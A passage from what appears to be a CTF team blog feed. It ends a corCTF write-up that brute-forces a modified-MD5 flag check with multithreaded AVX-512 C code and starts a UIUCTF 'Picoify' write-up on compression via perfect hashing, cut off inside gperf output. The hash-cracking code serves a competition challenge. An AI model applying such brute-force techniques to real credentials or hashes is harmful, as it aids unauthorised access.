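ALNUM = string.ascii_letters + string.digits   # 62 characters

# flag[16] is free, but flag[7] = flag[16] + 1 and flag[14] = flag[16] + 4
# must be alphanumeric too, which limits the choices for flag[16].
anchors = [c for c in ALNUM
           if chr(ord(c) + 1) in ALNUM and chr(ord(c) + 4) in ALNUM]

# Six more bytes stay free: flag[8], flag[9], flag[10], flag[12], flag[13],
# flag[15] (flag[17] and flag[11] are copies of flag[8] and flag[9]).
total = len(anchors) * len(ALNUM) ** 6

rate = 8 * 10**6        # measured single-threaded hashes per second
cores = 4
hours = total / rate / cores / 3600

print(len(anchors), total, round(hours, 1))
```

This gives 50 valid values for flag[16] and 2,840,011,779,200 candidates in total, which works out to roughly 25 hours at the measured rate on 4 cores.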
Optimizing the program by making use of the fact that the flag was always 11 bytes long and unrolling all of the loops, I was still only able to reach 1.3*10^7 hashes per second, or 15 hours. Still not nearly fast enough! Vectorization is OP A common “cheat” to magically increase a program’s speed is to use x86 SIMD instructions to perform vectorized operations on more than 64 bits at a time. Luckily, my computer supported AVX-512, an instruction set that allows performing 16 32-bit operations in parallel. I wrote a new MD5 implementation from scratch utilizing these instructions called md5_avx512, which could hash 16 11-byte strings at once. I was expecting maybe a 4-8x speedup, but it ended up being able to compute hashes 16x faster, which is the theoretical optimum! This brought the estimated time to just under an hour, which might just be fast enough. By the time I finished writing the program, we only had one hour left on the clock. Regardless, I ran the program and waited for a miracle. Unfortunately, it took longer than expected, as it had only reached the halfway point with only 10 minutes left on the clock. I held out for a clutch victory, but it did not come. Two stupid bugs After the CTF concluded I kept my program running, but it actually finished without finding any solution! To my (annoyed) disbelief, I ended up making two stupid bugs. One was using the flipped endianness for the target suffix, and the other was applying #pragma omp parallel for without realizing that it was overwriting variables between threads! 
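The endianness bug is easy to reproduce in a few lines. This is only an illustrative sketch (the variable names are mine): it reads the 8-byte target suffix as two 32-bit words in both byte orders, relying on the fact that MD5 serialises its state words little-endian.

```python
suffix = bytes.fromhex("19c603ba14353ce4")   # target suffix of the digest

# MD5 writes each 32-bit state word out little-endian, so the values held in
# registers are the byte-reversed readings of each 4-byte group.
c_le = int.from_bytes(suffix[:4], "little")
d_le = int.from_bytes(suffix[4:], "little")

# Reading the same bytes big-endian gives the flipped constants.
c_be = int.from_bytes(suffix[:4], "big")
d_be = int.from_bytes(suffix[4:], "big")

print(hex(c_le), hex(d_le))
print(hex(c_be), hex(d_be))
```

The little-endian pair, 0xba03c619 and 0xe43c3514, is what the fixed brute forcer compares against as T0 and T1; comparing the raw state words against the big-endian pair can never match the right flag.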
After fixing these bugs, I was at last able to run the multi-threaded, AVX-512 optimized MD5-0 brute forcer without any issues: // gcc -O3 -march=native -o brute brute.c &amp;&amp; ./brute #include &lt;immintrin.h&gt; #include &lt;pthread.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;string.h&gt; #define AVX512_F 0xca #define AVX512_G 0xe4 #define AVX512_H 0x96 #define AVX512_I 0x39 #define AVX512_STEP(f, a, b, c, d, r, k) { \ (a) = _mm512_add_epi32((a), _mm512_add_epi32(_mm512_ternarylogic_epi32((b), (c), (d), (f)), (k))); \ (a) = _mm512_add_epi32(_mm512_rol_epi32((a), (r)), (b)); \ } #define T0 0xba03c619 #define T1 0xe43c3514 static uint32_t md5_avx512(__m512i x0, __m512i x1, __m512i x2) { __m512i a = _mm512_setzero_si512(); __m512i b = _mm512_setzero_si512(); __m512i c = _mm512_setzero_si512(); __m512i d = _mm512_setzero_si512(); // Round 1 AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_add_epi32(x0, _mm512_set1_epi32(0xd76aa478))); AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_add_epi32(x1, _mm512_set1_epi32(0xe8c7b756))); AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_add_epi32(x2, _mm512_set1_epi32(0x242070db))); AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0xc1bdceee)); AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0xf57c0faf)); AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0x4787c62a)); AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xa8304613)); AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0xfd469501)); AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0x698098d8)); AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0x8b44f7af)); AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xffff5bb1)); AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0x895cd7be)); AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0x6b901122)); AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0xfd987193)); AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xa67943e6)); 
AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0x49b40821)); // Round 2 AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_add_epi32(x1, _mm512_set1_epi32(0xf61e2562))); AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0xc040b340)); AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0x265e5a51)); AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_add_epi32(x0, _mm512_set1_epi32(0xe9b6c7aa))); AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0xd62f105d)); AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0x02441453)); AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0xd8a1e681)); AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0xe7d3fbc8)); AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0x21e1cde6)); AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0xc337082e)); AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0xf4d50d87)); AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0x455a14ed)); AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0xa9e3e905)); AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_add_epi32(x2, _mm512_set1_epi32(0xfcefa3f8))); AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0x676f02d9)); AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0x8d2a4c8a)); // Round 3 AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0xfffa3942)); AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0x8771f681)); AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0x6d9d6122)); AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0xfde53864)); AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_add_epi32(x1, _mm512_set1_epi32(0xa4beea44))); AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0x4bdecfa9)); AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0xf6bb4b60)); AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0xbebfbc70)); AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0x289b7ec6)); AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_add_epi32(x0, 
_mm512_set1_epi32(0xeaa127fa))); AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0xd4ef3085)); AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0x04881d05)); AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0xd9d4d039)); AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0xe6db99e5)); AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0x1fa27cf8)); AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_add_epi32(x2, _mm512_set1_epi32(0xc4ac5665))); // Round 4 AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_add_epi32(x0, _mm512_set1_epi32(0xf4292244))); AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0x432aff97)); AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xab9423ff)); AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0xfc93a039)); AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0x655b59c3)); AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0x8f0ccc92)); AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xffeff47d)); AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_add_epi32(x1, _mm512_set1_epi32(0x85845dd1))); AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0x6fa87e4f)); AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0xfe2ce6e0)); AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xa3014314)); AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0x4e0811a1)); AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0xf7537e82)); AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0xbd3af235)); AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_add_epi32(x2, _mm512_set1_epi32(0x2ad7d2bb))); AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0xeb86d391)); __mmask16 eq_c = _mm512_cmpeq_epi32_mask(c, _mm512_set1_epi32(T0)); __mmask16 eq_d = _mm512_cmpeq_epi32_mask(d, _mm512_set1_epi32(T1)); __mmask16 eq = eq_c &amp; eq_d; if (eq) { __attribute__((aligned(64))) uint32_t _x0[16], _x1[16], _x2[16]; _mm512_store_si512(_x0, x0); _mm512_store_si512(_x1, x1); _mm512_store_si512(_x2, x2); 
for (int i = 0; i &lt; 16; i++) if ((eq &gt;&gt; i) &amp; 1) printf("found: %.4s%.4s%.4s\n", (uint8_t *)&amp;_x0[i], (uint8_t *)&amp;_x1[i], (uint8_t *)&amp;_x2[i]); } } #define A 62 #define NTHREADS 8 const char ALPHABET[64] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz00"; const char ALPHABET_S4[50] = "012345ABCDEFGHIJKLMNOPQRSTUVabcdefghijklmnopqrstuv"; static void *search(void *arg) { __attribute__((aligned(64))) uint32_t _x0[16], _x1[16], _x2[16]; int n = (uint64_t)arg; int start = n * (50 / NTHREADS); int end = n != NTHREADS - 1 ? (n + 1) * (50 / NTHREADS) : 50; printf("starting search [%d, %d)\n", start, end); uint8_t flag[12] = { 0 }; flag[11] = 0x80; const __m512i Y0 = _mm512_setr_epi32(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 65, 66, 67, 68, 69, 70); const __m512i Y1 = _mm512_setr_epi32(71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86); const __m512i Y2 = _mm512_setr_epi32(87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108); const __m512i Y3 = _mm512_setr_epi32(109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 48, 48); for (int c0 = start; c0 &lt; end; c0++) { flag[9] = ALPHABET_S4[c0]; flag[0] = ALPHABET_S4[c0] + 1; flag[7] = ALPHABET_S4[c0] + 4; for (int c1 = 0; c1 &lt; A; c1++) { flag[1] = flag[10] = ALPHABET[c1]; for (int c2 = 0; c2 &lt; A; c2++) { flag[2] = flag[4] = ALPHABET[c2]; for (int c3 = 0; c3 &lt; A; c3++) { flag[3] = ALPHABET[c3]; for (int c4 = 0; c4 &lt; A; c4++) { flag[5] = ALPHABET[c4]; for (int c5 = 0; c5 &lt; A; c5++) { flag[6] = ALPHABET[c5]; uint32_t *flag_u32 = (uint32_t *)flag; for (int i = 0; i &lt; 16; i++) { _x0[i] = flag_u32[0]; _x1[i] = flag_u32[1]; _x2[i] = flag_u32[2]; } __m512i x0 = _mm512_load_si512(_x0); __m512i x1 = _mm512_load_si512(_x1); __m512i x2 = _mm512_load_si512(_x2); md5_avx512(x0, x1, _mm512_or_si512(x2, Y0)); md5_avx512(x0, x1, _mm512_or_si512(x2, Y1)); md5_avx512(x0, x1, _mm512_or_si512(x2, Y2)); md5_avx512(x0, x1, _mm512_or_si512(x2, 
Y3)); } } } } } printf("checkpoint: %d (thread %d)\n", c0, n); } } int main() { pthread_t threads[NTHREADS]; for (uint64_t i = 0; i &lt; NTHREADS; i++) pthread_create(&amp;threads[i], NULL, search, (void *)i); for (uint64_t i = 0; i &lt; NTHREADS; i++) pthread_join(threads[i], NULL); return 0; } 1hr 20mins later, it found the flag: corctf{cPv3v8VfWbP}. The full flag emerges when it is submitted to digestme: $ ./digestme Welcome! Please enter the flag here: corctf{cPv3v8VfWbP} Nice! Full flag: corctf{youtu.be/dQw4w9WgXcQ} Final thoughts Despite being so close to solving it in the end – and also costing us 6th place, I enjoyed every part of the challenge, from converting the disassembly into bitwise operations and then 32-bit integer arithmetic, to realizing it was MD5 all along, and even writing the bruteforcer that I somehow messed up. I do believe the challenge would have been better off with a smaller search space, because some people (like me) don’t have strong CPUs or GPUs. On the other hand, I think performance optimization is fun, especially when SIMD is involved.]]></summary></entry><entry><title type="html">[UIUCTF 2024] Picoify (500)</title><link href="https://maplebacon.org/2024/07/uiuctf-picoify/" rel="alternate" type="text/html" title="[UIUCTF 2024] Picoify (500)" /><published>2024-07-01T00:00:00+00:00</published><updated>2024-07-01T00:00:00+00:00</updated><id>https://maplebacon.org/2024/07/uiuctf-picoify</id><content type="html" xml:base="https://maplebacon.org/2024/07/uiuctf-picoify/"><![CDATA[<h2 id="problem-description">Problem Description</h2>

<p>Picoify is a “king-of-the-hill” style challenge in which we’re tasked with implementing a compression algorithm and corresponding decompressor under fairly severe restrictions. Better compression results in a better score.</p>

<p>Specifically, the task is to write a compression algorithm for the Microchip PIC16F628A, a small 8-bit microcontroller with 2048 <em>words</em> of program memory (i.e. space for 2048 instructions), and 224 <em>bytes</em> of RAM. The decompressor is written in Python, but is run in a strict seccomp sandbox with tight memory and CPU limits.</p>

<p>The input text is 2048 bytes long, drawn randomly from a list of 8192 uppercase words, with certain letters (ABEGIOSTZ) randomly replaced by 1337-speak equivalents (50% probability). Here’s an example input:</p>

<blockquote>
  <p>RE4LLY RUG C1TI35 633K R35P1RA7ORY GUARD COL0URS P4PER PRO7EC73D SQU4R3 C0M81NE P0RC3L41N L0 NI 7ASKS CER4MIC YO6A 7ERM1NA7I0N C0N50L3S 3F N0RT0N F1RM N3C HELP5 R1M UM 7R166ER MURPHY H3LP SENS0R EXTR4ORDINARY 5UPER M0R0CC0 B0T5WANA C0NN3C710N M3NT10N WO0D5 E4R AUTHEN71C 6OV3RNM3N74L CHRI5 S33KER LIN6ER1E PR0DUC71ON 3XPLORER F4C3 FLO0D DECAD3 AN4LYSES AV6 4GE5 4U5 P455AGE D 8R42IL14N 8RIN61N6 63OR614 TUR80 B3LG1UM CSS ARMED 0U7COM3 U5IN6 8UDDY AU7OM471ON R35ULT3D JACKET 6R CHR0NIC BESIDES L4ND M0V135 PREP4RE F15HIN6 N1CK SCH3ME ALPINE MUL7I 5UPPL3M[…]</p>
</blockquote>

<p>The input is truncated to fit 2048 bytes, so the final word may be cut off.</p>

<p>The score of any submission is the number of bytes saved, and you need to compress by at least 25% to get a flag at all. Thus, the minimum score to get a flag is 512 (2048 * 1/4).</p>

<p>We’re provided with a starter PIC assembly file that just echoes the input back to the output, as well as a Dockerfile for running the scoring system locally.</p>

<h2 id="analysis">Analysis</h2>

<p>There are only 36 unique characters, so one very simple approach is to output 6 bits per character; this would be sufficient to score <strong>512</strong> and get a flag (output is 2048*6/8 = 1536 bytes exactly). We can be more clever with entropy encoding, which uses a variable number of bits per character; the Huffman algorithm is a common approach. We can use a quick script to calculate the average entropy of the texts and estimate the score of such an approach:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">collections</span> <span class="kn">import</span> <span class="n">Counter</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="n">c</span> <span class="o">=</span> <span class="n">Counter</span><span class="p">()</span>
<span class="n">samples</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">generate_data</span><span class="p">()</span>
    <span class="n">samples</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
    <span class="n">c</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>

<span class="n">total</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">samples</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2048</span>
<span class="n">entropy</span> <span class="o">=</span> <span class="nb">sum</span><span class="p">((</span><span class="n">v</span> <span class="o">/</span> <span class="n">total</span><span class="p">)</span> <span class="o">*</span> <span class="o">-</span><span class="n">math</span><span class="p">.</span><span class="n">log2</span><span class="p">(</span><span class="n">v</span> <span class="o">/</span> <span class="n">total</span><span class="p">)</span> <span class="k">for</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">c</span><span class="p">.</span><span class="n">values</span><span class="p">())</span>
<span class="k">print</span><span class="p">(</span><span class="n">entropy</span><span class="p">)</span>
</code></pre></div></div>

<p>This produces an entropy of 4.67 bits per character, meaning that we should be able to score around <strong>852</strong> with a Huffman-based approach (2048*4.67/8 ≈ 1196). From the challenge scoreboard provided by the organizers, it seems most successful teams took this approach.</p>
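<p>To make the two estimates above concrete, here is a minimal sketch that measures both the fixed 6-bit size and a Huffman-coded size for a piece of text. The helper names (<code class="language-plaintext highlighter-rouge">fixed_width_size</code>, <code class="language-plaintext highlighter-rouge">huffman_code_lengths</code>, <code class="language-plaintext highlighter-rouge">huffman_size</code>) are made up for illustration, and the code table is built from the sample itself, whereas a real submission would presumably bake a fixed table into both the compressor and the decompressor.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import heapq
from collections import Counter

def fixed_width_size(text, bits_per_char=6):
    """Bytes needed when every character takes the same number of bits."""
    return (len(text) * bits_per_char + 7) // 8

def huffman_code_lengths(freqs):
    """Return {symbol: code length in bits} for a Huffman code over freqs."""
    # Heap entries are (weight, tiebreak, symbols inside this subtree).
    heap = [(w, i, [s]) for i, (s, w) in enumerate(sorted(freqs.items()))]
    heapq.heapify(heap)
    lengths = dict.fromkeys(freqs, 0)
    if len(heap) == 1:
        # A single distinct symbol still needs one bit per occurrence.
        lengths[heap[0][2][0]] = 1
        return lengths
    tiebreak = len(heap)
    while len(heap) != 1:
        w1, _, s1 = heapq.heappop(heap)
        w2, _, s2 = heapq.heappop(heap)
        # Merging two subtrees pushes every symbol in them one level deeper.
        for s in s1 + s2:
            lengths[s] += 1
        heapq.heappush(heap, (w1 + w2, tiebreak, s1 + s2))
        tiebreak += 1
    return lengths

def huffman_size(text):
    """Bytes needed for text under a Huffman code built from its own counts."""
    freqs = Counter(text)
    lengths = huffman_code_lengths(freqs)
    bits = sum(freqs[s] * lengths[s] for s in freqs)
    return (bits + 7) // 8

sample = "RE4LLY RUG C1TI35 633K R35P1RA7ORY GUARD COL0URS P4PER"
print(fixed_width_size(sample), huffman_size(sample))
</code></pre></div></div>

<p>Huffman codes use a whole number of bits per symbol, so the measured size sits slightly above what the entropy figure alone would suggest.</p>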

<p>While I considered these approaches, I figured it should be possible to score much higher given the constrained nature of the input text: there are only 8192 words (13 bits of entropy <em>per word</em>), and a few bits of extra entropy per word to account for the random 1337-speak letters (1 bit of entropy per 1337-speakable letter). Running a quick simulation, if we’re able to actually encode each word using exactly 13 bits (plus 1337-speak bits), we could score an average of 1485 (average output size is 562.8 bytes):</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span><span class="p">,</span> <span class="n">statistics</span>
<span class="n">comp_bits</span> <span class="o">=</span> <span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">t</span><span class="p">.</span><span class="n">split</span><span class="p">())</span> <span class="o">*</span> <span class="mi">13</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">b</span><span class="s">"[ABEGIOSTZ483610572]"</span><span class="p">,</span> <span class="n">t</span><span class="p">))</span> <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">samples</span><span class="p">]</span>
<span class="k">print</span><span class="p">(</span><span class="n">statistics</span><span class="p">.</span><span class="n">mean</span><span class="p">(</span><span class="n">comp_bits</span><span class="p">)</span> <span class="o">/</span> <span class="mi">8</span><span class="p">)</span>
</code></pre></div></div>

<p>This sets a rough upper bound on the score of <em>any</em> compression algorithm - it measures the amount of entropy used to generate the input text in the first place.</p>

<h2 id="the-compressor">The Compressor</h2>

<p>For encoding words using a minimum number of bits, we can use <em>perfect hashing</em>. A perfect hash function is one which maps every input in a finite set to a unique numerical value with no collisions. If we can find a perfect hash function for our wordlist, we could compress by outputting the hash values for each word; as there are no collisions, the decompressor could uniquely map these back to the original words.</p>
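<p>As a toy illustration of the idea (not the function used in the actual solution), the sketch below searches for a salt that makes a stand-in hash collision-free over a handful of words, then round-trips a few words through their hash values. The word list, <code class="language-plaintext highlighter-rouge">toy_hash</code>, <code class="language-plaintext highlighter-rouge">find_perfect_salt</code> and the table size of 64 are all assumptions chosen for the example.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import hashlib

WORDS = ["REALLY", "RUG", "CITIES", "GEEK", "GUARD", "PAPER", "SQUARE", "HELP"]

def toy_hash(word, salt, table_size):
    # Stand-in hash: salted SHA-256 reduced to a small range (an assumption,
    # unrelated to the function a perfect hash generator would emit).
    digest = hashlib.sha256(bytes([salt]) + word.encode("ascii")).digest()
    return int.from_bytes(digest[:4], "big") % table_size

def find_perfect_salt(words, table_size):
    """Try salts until every word lands in its own slot."""
    for salt in range(256):
        if len({toy_hash(w, salt, table_size) for w in words}) == len(words):
            return salt
    raise ValueError("no collision-free salt found; enlarge table_size")

TABLE_SIZE = 64
salt = find_perfect_salt(WORDS, TABLE_SIZE)

# Compressor side maps word to number; decompressor side maps number to word.
decode_table = {toy_hash(w, salt, TABLE_SIZE): w for w in WORDS}
codes = [toy_hash(w, salt, TABLE_SIZE) for w in ["GEEK", "RUG", "HELP"]]
print([decode_table[c] for c in codes])
</code></pre></div></div>

<p>Brute-forcing a salt like this only works for tiny word sets; the full 8192-word list calls for a purpose-built generator.</p>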

<p>Luckily, the <a href="https://www.gnu.org/software/gperf/">GNU <code class="language-plaintext highlighter-rouge">gperf</code></a> command is designed specifically for this purpose. It is normally used to derive perfect hash functions for sets of keywords (e.g. for parsing a programming language). We can just feed <code class="language-plaintext highlighter-rouge">gperf</code> our entire wordlist: <code class="language-plaintext highlighter-rouge">head -n 8192 words.txt | tr a-z A-Z | gperf -n -m=10 -k '1-11,$' -7 &gt; gperf.c</code>.</p>

<p><code class="language-plaintext highlighter-rouge">gperf</code> outputs C code which implements the perfect hash function:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">int</span>
<span class="n">hash</span> <span class="p">(</span><span class="n">str</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span>
     <span class="k">register</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">str</span><span class="p">;</span>
     <span class="k">register</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>
<span class="p">{</span>
  <span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">asso_values</span><span class="p">[]</span> <span class="o">=</span>
    <span class="p">{</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>    <span class="mi">145</span><span class="p">,</span>  <span class="mi">22134</span><span class="p">,</span>  <span class="mi">14665</span><span class="p">,</span>   <span class="mi">7025</span><span class="p">,</span>     <span class="mi">20</span><span class="p">,</span>
       <span class="mi">43498</span><span class="p">,</span>   <span class="mi">6070</span><span class="p">,</span>   <span class="mi">2551</span><span class="p">,</span>     <span class="mi">60</span><span class="p">,</span>  <span class="mi">13988</span><span class="p">,</span>  <span class="mi">38948</span><span class="p">,</span>   <span class="mi">1820</span><span class="p">,</span>  <span class="mi">30148</span><span class="p">,</span>     <span class="mi">15</span><span class="p">,</span>     <span class="mi">85</span><span class="p">,</span>
        <span class="mi">6351</span><span class="p">,</span>   <span class="mi">5350</span><span class="p">,</span>     <span class="mi">25</span><span class="p">,</span>      <span class="mi">5</span><span class="p">,</span>     <span class="mi">65</span><span class="p">,</span>    <span class="mi">555</span><span class="p">,</span>  <span class="mi">14565</span><span class="p">,</span>   <span class="mi">2027</span><span class="p">,</span>    <span class="mi">295</span><span class="p">,</span>    <span class="mi">735</span><span class="p">,</span>
       <span class="mi">45643</span><span class="p">,</span>  <span class="mi">29266</span><span class="p">,</span>   <span class="mi">7705</span><span class="p">,</span>  <span class="mi">42888</span><span class="p">,</span>  <span class="mi">10966</span><span class="p">,</span>     <span class="mi">21</span><span class="p">,</span>   <span class="mi">4875</span><span class="p">,</span>    <span class="mi">325</span><span class="p">,</span>   <span class="mi">4725</span><span class="p">,</span>  <span class="mi">53578</span><span class="p">,</span>
       <span class="mi">57958</span><span class="p">,</span>  <span class="mi">14261</span><span class="p">,</span>   <span class="mi">1220</span><span class="p">,</span>  <span class="mi">29394</span><span class="p">,</span>  <span class="mi">60128</span><span class="p">,</span>  <span class="mi">26679</span><span class="p">,</span>  <span class="mi">45243</span><span class="p">,</span>    <span class="mi">275</span><span class="p">,</span>   <span class="mi">2250</span><span class="p">,</span>   <span class="mi">1350</span><span class="p">,</span>
       <span class="mi">23954</span><span class="p">,</span>    <span class="mi">585</span><span class="p">,</span>    <span class="mi">430</span><span class="p">,</span>     <span class="mi">90</span><span class="p">,</span>  <span class="mi">35098</span><span class="p">,</span>  <span class="mi">11101</span><span class="p">,</span>  <span class="mi">49537</span><span class="p">,</span>    <span class="mi">401</span><span class="p">,</span>  <span class="mi">51258</span><span class="p">,</span>      <span class="mi">1</span><span class="p">,</span>
